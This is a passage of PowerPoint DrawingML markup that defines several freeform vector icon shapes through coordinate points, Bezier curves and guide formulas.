                      <a:pt x="76" y="111"/>
                      <a:pt x="73" y="113"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="71" y="115"/>
                      <a:pt x="69" y="116"/>
                      <a:pt x="67" y="116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87" y="92"/>
                      <a:pt x="87" y="92"/>
                      <a:pt x="87" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="96"/>
                      <a:pt x="84" y="99"/>
                      <a:pt x="82" y="102"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="67" y="83"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="67"/>
                      <a:pt x="67" y="67"/>
                      <a:pt x="67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73"/>
                      <a:pt x="91" y="78"/>
                      <a:pt x="90" y="83"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="67" y="83"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="100" y="59"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="53"/>
                      <a:pt x="99" y="47"/>
                      <a:pt x="98" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="42"/>
                      <a:pt x="113" y="42"/>
                      <a:pt x="113" y="42"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="47"/>
                      <a:pt x="116" y="53"/>
                      <a:pt x="117" y="59"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="100" y="59"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="108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93" y="26"/>
                      <a:pt x="90" y="19"/>
                      <a:pt x="86" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="92" y="17"/>
                      <a:pt x="97" y="20"/>
                      <a:pt x="101" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="104" y="27"/>
                      <a:pt x="106" y="30"/>
                      <a:pt x="108" y="34"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="25" y="24"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="20"/>
                      <a:pt x="34" y="17"/>
                      <a:pt x="39" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="19"/>
                      <a:pt x="32" y="26"/>
                      <a:pt x="30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9" y="30"/>
                      <a:pt x="22" y="27"/>
                      <a:pt x="25" y="24"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="17" y="92"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="30" y="92"/>
                      <a:pt x="30" y="92"/>
                      <a:pt x="30" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="99"/>
                      <a:pt x="35" y="106"/>
                      <a:pt x="39" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="109"/>
                      <a:pt x="29" y="105"/>
                      <a:pt x="25" y="101"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="98"/>
                      <a:pt x="19" y="95"/>
                      <a:pt x="17" y="92"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="101" y="101"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="105"/>
                      <a:pt x="92" y="109"/>
                      <a:pt x="86" y="111"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="106"/>
                      <a:pt x="93" y="99"/>
                      <a:pt x="96" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="92"/>
                      <a:pt x="108" y="92"/>
                      <a:pt x="108" y="92"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="106" y="95"/>
                      <a:pt x="104" y="98"/>
                      <a:pt x="101" y="10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5" name="Freeform 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BBC221F-5844-43A9-A68E-33DC78E53F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77753" y="1690759"/>
                <a:ext cx="189861" cy="187904"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 49 w 59"/>
                  <a:gd name="T1" fmla="*/ 0 h 59"/>
                  <a:gd name="T2" fmla="*/ 9 w 59"/>
                  <a:gd name="T3" fmla="*/ 0 h 59"/>
                  <a:gd name="T4" fmla="*/ 0 w 59"/>
                  <a:gd name="T5" fmla="*/ 10 h 59"/>
                  <a:gd name="T6" fmla="*/ 0 w 59"/>
                  <a:gd name="T7" fmla="*/ 49 h 59"/>
                  <a:gd name="T8" fmla="*/ 9 w 59"/>
                  <a:gd name="T9" fmla="*/ 59 h 59"/>
                  <a:gd name="T10" fmla="*/ 49 w 59"/>
                  <a:gd name="T11" fmla="*/ 59 h 59"/>
                  <a:gd name="T12" fmla="*/ 59 w 59"/>
                  <a:gd name="T13" fmla="*/ 49 h 59"/>
                  <a:gd name="T14" fmla="*/ 59 w 59"/>
                  <a:gd name="T15" fmla="*/ 10 h 59"/>
                  <a:gd name="T16" fmla="*/ 49 w 59"/>
                  <a:gd name="T17" fmla="*/ 0 h 59"/>
                  <a:gd name="T18" fmla="*/ 40 w 59"/>
                  <a:gd name="T19" fmla="*/ 2 h 59"/>
                  <a:gd name="T20" fmla="*/ 40 w 59"/>
                  <a:gd name="T21" fmla="*/ 11 h 59"/>
                  <a:gd name="T22" fmla="*/ 31 w 59"/>
                  <a:gd name="T23" fmla="*/ 11 h 59"/>
                  <a:gd name="T24" fmla="*/ 31 w 59"/>
                  <a:gd name="T25" fmla="*/ 2 h 59"/>
                  <a:gd name="T26" fmla="*/ 40 w 59"/>
                  <a:gd name="T27" fmla="*/ 2 h 59"/>
                  <a:gd name="T28" fmla="*/ 27 w 59"/>
                  <a:gd name="T29" fmla="*/ 2 h 59"/>
                  <a:gd name="T30" fmla="*/ 27 w 59"/>
                  <a:gd name="T31" fmla="*/ 11 h 59"/>
                  <a:gd name="T32" fmla="*/ 18 w 59"/>
                  <a:gd name="T33" fmla="*/ 11 h 59"/>
                  <a:gd name="T34" fmla="*/ 18 w 59"/>
                  <a:gd name="T35" fmla="*/ 2 h 59"/>
                  <a:gd name="T36" fmla="*/ 27 w 59"/>
                  <a:gd name="T37" fmla="*/ 2 h 59"/>
                  <a:gd name="T38" fmla="*/ 1 w 59"/>
                  <a:gd name="T39" fmla="*/ 11 h 59"/>
                  <a:gd name="T40" fmla="*/ 1 w 59"/>
                  <a:gd name="T41" fmla="*/ 10 h 59"/>
                  <a:gd name="T42" fmla="*/ 9 w 59"/>
                  <a:gd name="T43" fmla="*/ 2 h 59"/>
                  <a:gd name="T44" fmla="*/ 14 w 59"/>
                  <a:gd name="T45" fmla="*/ 2 h 59"/>
                  <a:gd name="T46" fmla="*/ 14 w 59"/>
                  <a:gd name="T47" fmla="*/ 11 h 59"/>
                  <a:gd name="T48" fmla="*/ 1 w 59"/>
                  <a:gd name="T49" fmla="*/ 11 h 59"/>
                  <a:gd name="T50" fmla="*/ 44 w 59"/>
                  <a:gd name="T51" fmla="*/ 37 h 59"/>
                  <a:gd name="T52" fmla="*/ 33 w 59"/>
                  <a:gd name="T53" fmla="*/ 37 h 59"/>
                  <a:gd name="T54" fmla="*/ 33 w 59"/>
                  <a:gd name="T55" fmla="*/ 48 h 59"/>
                  <a:gd name="T56" fmla="*/ 25 w 59"/>
                  <a:gd name="T57" fmla="*/ 48 h 59"/>
                  <a:gd name="T58" fmla="*/ 25 w 59"/>
                  <a:gd name="T59" fmla="*/ 37 h 59"/>
                  <a:gd name="T60" fmla="*/ 14 w 59"/>
                  <a:gd name="T61" fmla="*/ 37 h 59"/>
                  <a:gd name="T62" fmla="*/ 14 w 59"/>
                  <a:gd name="T63" fmla="*/ 30 h 59"/>
                  <a:gd name="T64" fmla="*/ 25 w 59"/>
                  <a:gd name="T65" fmla="*/ 30 h 59"/>
                  <a:gd name="T66" fmla="*/ 25 w 59"/>
                  <a:gd name="T67" fmla="*/ 18 h 59"/>
                  <a:gd name="T68" fmla="*/ 33 w 59"/>
                  <a:gd name="T69" fmla="*/ 18 h 59"/>
                  <a:gd name="T70" fmla="*/ 33 w 59"/>
                  <a:gd name="T71" fmla="*/ 30 h 59"/>
                  <a:gd name="T72" fmla="*/ 44 w 59"/>
                  <a:gd name="T73" fmla="*/ 30 h 59"/>
                  <a:gd name="T74" fmla="*/ 44 w 59"/>
                  <a:gd name="T75" fmla="*/ 37 h 59"/>
                  <a:gd name="T76" fmla="*/ 57 w 59"/>
                  <a:gd name="T77" fmla="*/ 11 h 59"/>
                  <a:gd name="T78" fmla="*/ 44 w 59"/>
                  <a:gd name="T79" fmla="*/ 11 h 59"/>
                  <a:gd name="T80" fmla="*/ 44 w 59"/>
                  <a:gd name="T81" fmla="*/ 2 h 59"/>
                  <a:gd name="T82" fmla="*/ 49 w 59"/>
                  <a:gd name="T83" fmla="*/ 2 h 59"/>
                  <a:gd name="T84" fmla="*/ 57 w 59"/>
                  <a:gd name="T85" fmla="*/ 10 h 59"/>
                  <a:gd name="T86" fmla="*/ 57 w 59"/>
                  <a:gd name="T8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9" h="59">
                    <a:moveTo>
                      <a:pt x="49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55"/>
                      <a:pt x="4" y="59"/>
                      <a:pt x="9" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="59"/>
                      <a:pt x="49" y="59"/>
                      <a:pt x="49" y="59"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="59"/>
                      <a:pt x="59" y="55"/>
                      <a:pt x="59" y="49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4"/>
                      <a:pt x="54" y="0"/>
                      <a:pt x="49" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="40" y="2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2"/>
                      <a:pt x="31" y="2"/>
                      <a:pt x="31" y="2"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="40" y="2"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="27" y="2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2"/>
                      <a:pt x="18" y="2"/>
                      <a:pt x="18" y="2"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="27" y="2"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="1" y="11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5"/>
                      <a:pt x="5" y="2"/>
                      <a:pt x="9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1"/>
                      <a:pt x="14" y="11"/>
                      <a:pt x="14" y="11"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1" y="11"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="44" y="37"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="37"/>
                      <a:pt x="33" y="37"/>
                      <a:pt x="33" y="37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25" y="30"/>
                      <a:pt x="25" y="30"/>
                      <a:pt x="25" y="30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18"/>
                      <a:pt x="33" y="18"/>
                      <a:pt x="33" y="18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4" y="37"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="57" y="11"/>
                    </a:move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53" y="2"/>
                      <a:pt x="57" y="5"/>
                      <a:pt x="57" y="10"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="5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6" name="Freeform 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB172173-AF71-4754-9D54-FAE15C0451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93059" y="1731862"/>
                <a:ext cx="176160" cy="137013"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 34 w 90"/>
                  <a:gd name="T1" fmla="*/ 70 h 70"/>
                  <a:gd name="T2" fmla="*/ 0 w 90"/>
                  <a:gd name="T3" fmla="*/ 36 h 70"/>
                  <a:gd name="T4" fmla="*/ 18 w 90"/>
                  <a:gd name="T5" fmla="*/ 19 h 70"/>
                  <a:gd name="T6" fmla="*/ 34 w 90"/>
                  <a:gd name="T7" fmla="*/ 36 h 70"/>
                  <a:gd name="T8" fmla="*/ 72 w 90"/>
                  <a:gd name="T9" fmla="*/ 0 h 70"/>
                  <a:gd name="T10" fmla="*/ 90 w 90"/>
                  <a:gd name="T11" fmla="*/ 16 h 70"/>
                  <a:gd name="T12" fmla="*/ 34 w 90"/>
                  <a:gd name="T13" fmla="*/ 70 h 70"/>
                  <a:gd name="T14" fmla="*/ 9 w 90"/>
                  <a:gd name="T15" fmla="*/ 36 h 70"/>
                  <a:gd name="T16" fmla="*/ 34 w 90"/>
                  <a:gd name="T17" fmla="*/ 60 h 70"/>
                  <a:gd name="T18" fmla="*/ 80 w 90"/>
                  <a:gd name="T19" fmla="*/ 16 h 70"/>
                  <a:gd name="T20" fmla="*/ 72 w 90"/>
                  <a:gd name="T21" fmla="*/ 8 h 70"/>
                  <a:gd name="T22" fmla="*/ 34 w 90"/>
                  <a:gd name="T23" fmla="*/ 46 h 70"/>
                  <a:gd name="T24" fmla="*/ 18 w 90"/>
                  <a:gd name="T25" fmla="*/ 28 h 70"/>
                  <a:gd name="T26" fmla="*/ 9 w 90"/>
                  <a:gd name="T27" fmla="*/ 3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0" h="70">
                    <a:moveTo>
                      <a:pt x="34" y="70"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="70"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9" y="36"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="34" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9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7" name="Freeform 93">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7821CAE5-3034-42DC-BB70-6DC8048B139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89144" y="4738319"/>
                <a:ext cx="252496" cy="258367"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 69 w 79"/>
                  <a:gd name="T1" fmla="*/ 22 h 81"/>
                  <a:gd name="T2" fmla="*/ 22 w 79"/>
                  <a:gd name="T3" fmla="*/ 14 h 81"/>
                  <a:gd name="T4" fmla="*/ 19 w 79"/>
                  <a:gd name="T5" fmla="*/ 3 h 81"/>
                  <a:gd name="T6" fmla="*/ 0 w 79"/>
                  <a:gd name="T7" fmla="*/ 5 h 81"/>
                  <a:gd name="T8" fmla="*/ 12 w 79"/>
                  <a:gd name="T9" fmla="*/ 12 h 81"/>
                  <a:gd name="T10" fmla="*/ 14 w 79"/>
                  <a:gd name="T11" fmla="*/ 54 h 81"/>
                  <a:gd name="T12" fmla="*/ 61 w 79"/>
                  <a:gd name="T13" fmla="*/ 59 h 81"/>
                  <a:gd name="T14" fmla="*/ 76 w 79"/>
                  <a:gd name="T15" fmla="*/ 20 h 81"/>
                  <a:gd name="T16" fmla="*/ 36 w 79"/>
                  <a:gd name="T17" fmla="*/ 32 h 81"/>
                  <a:gd name="T18" fmla="*/ 45 w 79"/>
                  <a:gd name="T19" fmla="*/ 39 h 81"/>
                  <a:gd name="T20" fmla="*/ 44 w 79"/>
                  <a:gd name="T21" fmla="*/ 44 h 81"/>
                  <a:gd name="T22" fmla="*/ 33 w 79"/>
                  <a:gd name="T23" fmla="*/ 47 h 81"/>
                  <a:gd name="T24" fmla="*/ 44 w 79"/>
                  <a:gd name="T25" fmla="*/ 44 h 81"/>
                  <a:gd name="T26" fmla="*/ 38 w 79"/>
                  <a:gd name="T27" fmla="*/ 23 h 81"/>
                  <a:gd name="T28" fmla="*/ 47 w 79"/>
                  <a:gd name="T29" fmla="*/ 29 h 81"/>
                  <a:gd name="T30" fmla="*/ 22 w 79"/>
                  <a:gd name="T31" fmla="*/ 19 h 81"/>
                  <a:gd name="T32" fmla="*/ 32 w 79"/>
                  <a:gd name="T33" fmla="*/ 27 h 81"/>
                  <a:gd name="T34" fmla="*/ 22 w 79"/>
                  <a:gd name="T35" fmla="*/ 19 h 81"/>
                  <a:gd name="T36" fmla="*/ 31 w 79"/>
                  <a:gd name="T37" fmla="*/ 32 h 81"/>
                  <a:gd name="T38" fmla="*/ 21 w 79"/>
                  <a:gd name="T39" fmla="*/ 35 h 81"/>
                  <a:gd name="T40" fmla="*/ 20 w 79"/>
                  <a:gd name="T41" fmla="*/ 40 h 81"/>
                  <a:gd name="T42" fmla="*/ 28 w 79"/>
                  <a:gd name="T43" fmla="*/ 46 h 81"/>
                  <a:gd name="T44" fmla="*/ 20 w 79"/>
                  <a:gd name="T45" fmla="*/ 40 h 81"/>
                  <a:gd name="T46" fmla="*/ 48 w 79"/>
                  <a:gd name="T47" fmla="*/ 50 h 81"/>
                  <a:gd name="T48" fmla="*/ 57 w 79"/>
                  <a:gd name="T49" fmla="*/ 47 h 81"/>
                  <a:gd name="T50" fmla="*/ 59 w 79"/>
                  <a:gd name="T51" fmla="*/ 42 h 81"/>
                  <a:gd name="T52" fmla="*/ 51 w 79"/>
                  <a:gd name="T53" fmla="*/ 35 h 81"/>
                  <a:gd name="T54" fmla="*/ 59 w 79"/>
                  <a:gd name="T55" fmla="*/ 42 h 81"/>
                  <a:gd name="T56" fmla="*/ 52 w 79"/>
                  <a:gd name="T57" fmla="*/ 30 h 81"/>
                  <a:gd name="T58" fmla="*/ 66 w 79"/>
                  <a:gd name="T59" fmla="*/ 28 h 81"/>
                  <a:gd name="T60" fmla="*/ 9 w 79"/>
                  <a:gd name="T61" fmla="*/ 66 h 81"/>
                  <a:gd name="T62" fmla="*/ 24 w 79"/>
                  <a:gd name="T63" fmla="*/ 69 h 81"/>
                  <a:gd name="T64" fmla="*/ 18 w 79"/>
                  <a:gd name="T65" fmla="*/ 60 h 81"/>
                  <a:gd name="T66" fmla="*/ 39 w 79"/>
                  <a:gd name="T67" fmla="*/ 72 h 81"/>
                  <a:gd name="T68" fmla="*/ 54 w 79"/>
                  <a:gd name="T69" fmla="*/ 75 h 81"/>
                  <a:gd name="T70" fmla="*/ 48 w 79"/>
                  <a:gd name="T71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9" h="81">
                    <a:moveTo>
                      <a:pt x="76" y="20"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="19"/>
                      <a:pt x="70" y="20"/>
                      <a:pt x="69" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68" y="23"/>
                      <a:pt x="68" y="23"/>
                      <a:pt x="68" y="2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6"/>
                      <a:pt x="21" y="4"/>
                      <a:pt x="19" y="3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0"/>
                      <a:pt x="1" y="2"/>
                      <a:pt x="0" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="8"/>
                      <a:pt x="1" y="10"/>
                      <a:pt x="4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0" y="51"/>
                      <a:pt x="11" y="53"/>
                      <a:pt x="14" y="54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8" y="63"/>
                      <a:pt x="60" y="62"/>
                      <a:pt x="61" y="59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4"/>
                      <a:pt x="78" y="21"/>
                      <a:pt x="76" y="20"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="35" y="37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5" y="39"/>
                      <a:pt x="45" y="39"/>
                      <a:pt x="45" y="39"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="35" y="37"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="44" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="49"/>
                      <a:pt x="43" y="49"/>
                      <a:pt x="43" y="49"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="47"/>
                      <a:pt x="33" y="47"/>
                      <a:pt x="33" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="42"/>
                      <a:pt x="34" y="42"/>
                      <a:pt x="34" y="42"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="44" y="44"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="37" y="28"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="23"/>
                      <a:pt x="38" y="23"/>
                      <a:pt x="38" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="25"/>
                      <a:pt x="48" y="25"/>
                      <a:pt x="48" y="25"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="29"/>
                      <a:pt x="47" y="29"/>
                      <a:pt x="47" y="29"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="37" y="28"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="22" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="22"/>
                      <a:pt x="33" y="22"/>
                      <a:pt x="33" y="22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1" y="25"/>
                      <a:pt x="21" y="25"/>
                      <a:pt x="21" y="25"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="22" y="19"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="21" y="30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1" y="35"/>
                      <a:pt x="21" y="35"/>
                      <a:pt x="21" y="35"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21" y="30"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="20" y="40"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="41"/>
                      <a:pt x="29" y="41"/>
                      <a:pt x="29" y="41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0" y="45"/>
                      <a:pt x="20" y="45"/>
                      <a:pt x="20" y="45"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="20" y="40"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="54" y="52"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="48" y="50"/>
                      <a:pt x="48" y="50"/>
                      <a:pt x="48" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="45"/>
                      <a:pt x="49" y="45"/>
                      <a:pt x="49" y="45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4" y="52"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="59" y="42"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="40"/>
                      <a:pt x="50" y="40"/>
                      <a:pt x="50" y="40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61" y="37"/>
                      <a:pt x="61" y="37"/>
                      <a:pt x="61" y="37"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="59" y="42"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="64" y="33"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="30"/>
                      <a:pt x="52" y="30"/>
                      <a:pt x="52" y="30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66" y="28"/>
                      <a:pt x="66" y="28"/>
                      <a:pt x="66" y="28"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="64" y="33"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9" y="66"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="8" y="70"/>
                      <a:pt x="11" y="74"/>
                      <a:pt x="15" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19" y="76"/>
                      <a:pt x="23" y="73"/>
                      <a:pt x="24" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="69"/>
                      <a:pt x="24" y="69"/>
                      <a:pt x="24" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25" y="65"/>
                      <a:pt x="22" y="61"/>
                      <a:pt x="18" y="60"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="59"/>
                      <a:pt x="10" y="62"/>
                      <a:pt x="9" y="66"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="39" y="72"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="76"/>
                      <a:pt x="41" y="80"/>
                      <a:pt x="45" y="81"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="49" y="81"/>
                      <a:pt x="53" y="79"/>
                      <a:pt x="54" y="75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4" y="70"/>
                      <a:pt x="52" y="66"/>
                      <a:pt x="48" y="66"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="65"/>
                      <a:pt x="39" y="68"/>
                      <a:pt x="39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8" name="Freeform 94">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D57CCDF-F81D-4981-860B-7D9967320C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75090" y="4354682"/>
                <a:ext cx="150715" cy="152672"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 24 w 47"/>
                  <a:gd name="T1" fmla="*/ 0 h 48"/>
                  <a:gd name="T2" fmla="*/ 0 w 47"/>
                  <a:gd name="T3" fmla="*/ 24 h 48"/>
                  <a:gd name="T4" fmla="*/ 24 w 47"/>
                  <a:gd name="T5" fmla="*/ 48 h 48"/>
                  <a:gd name="T6" fmla="*/ 47 w 47"/>
                  <a:gd name="T7" fmla="*/ 24 h 48"/>
                  <a:gd name="T8" fmla="*/ 24 w 47"/>
                  <a:gd name="T9" fmla="*/ 0 h 48"/>
                  <a:gd name="T10" fmla="*/ 6 w 47"/>
                  <a:gd name="T11" fmla="*/ 24 h 48"/>
                  <a:gd name="T12" fmla="*/ 24 w 47"/>
                  <a:gd name="T13" fmla="*/ 6 h 48"/>
                  <a:gd name="T14" fmla="*/ 24 w 47"/>
                  <a:gd name="T15" fmla="*/ 42 h 48"/>
                  <a:gd name="T16" fmla="*/ 6 w 47"/>
                  <a:gd name="T17" fmla="*/ 2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8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37" y="48"/>
                      <a:pt x="47" y="37"/>
                      <a:pt x="47" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="47" y="11"/>
                      <a:pt x="37" y="0"/>
                      <a:pt x="24" y="0"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6" y="24"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="14"/>
                      <a:pt x="14" y="6"/>
                      <a:pt x="24" y="6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14" y="42"/>
                      <a:pt x="6" y="34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59" name="Freeform 95">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3B29973-E6EF-45C6-8613-7E565461DF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42344" y="3839905"/>
                <a:ext cx="379722" cy="369934"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 22 w 119"/>
                  <a:gd name="T1" fmla="*/ 19 h 116"/>
                  <a:gd name="T2" fmla="*/ 58 w 119"/>
                  <a:gd name="T3" fmla="*/ 33 h 116"/>
                  <a:gd name="T4" fmla="*/ 62 w 119"/>
                  <a:gd name="T5" fmla="*/ 12 h 116"/>
                  <a:gd name="T6" fmla="*/ 82 w 119"/>
                  <a:gd name="T7" fmla="*/ 3 h 116"/>
                  <a:gd name="T8" fmla="*/ 91 w 119"/>
                  <a:gd name="T9" fmla="*/ 23 h 116"/>
                  <a:gd name="T10" fmla="*/ 95 w 119"/>
                  <a:gd name="T11" fmla="*/ 49 h 116"/>
                  <a:gd name="T12" fmla="*/ 95 w 119"/>
                  <a:gd name="T13" fmla="*/ 50 h 116"/>
                  <a:gd name="T14" fmla="*/ 99 w 119"/>
                  <a:gd name="T15" fmla="*/ 41 h 116"/>
                  <a:gd name="T16" fmla="*/ 119 w 119"/>
                  <a:gd name="T17" fmla="*/ 49 h 116"/>
                  <a:gd name="T18" fmla="*/ 93 w 119"/>
                  <a:gd name="T19" fmla="*/ 116 h 116"/>
                  <a:gd name="T20" fmla="*/ 73 w 119"/>
                  <a:gd name="T21" fmla="*/ 109 h 116"/>
                  <a:gd name="T22" fmla="*/ 75 w 119"/>
                  <a:gd name="T23" fmla="*/ 103 h 116"/>
                  <a:gd name="T24" fmla="*/ 63 w 119"/>
                  <a:gd name="T25" fmla="*/ 103 h 116"/>
                  <a:gd name="T26" fmla="*/ 53 w 119"/>
                  <a:gd name="T27" fmla="*/ 106 h 116"/>
                  <a:gd name="T28" fmla="*/ 35 w 119"/>
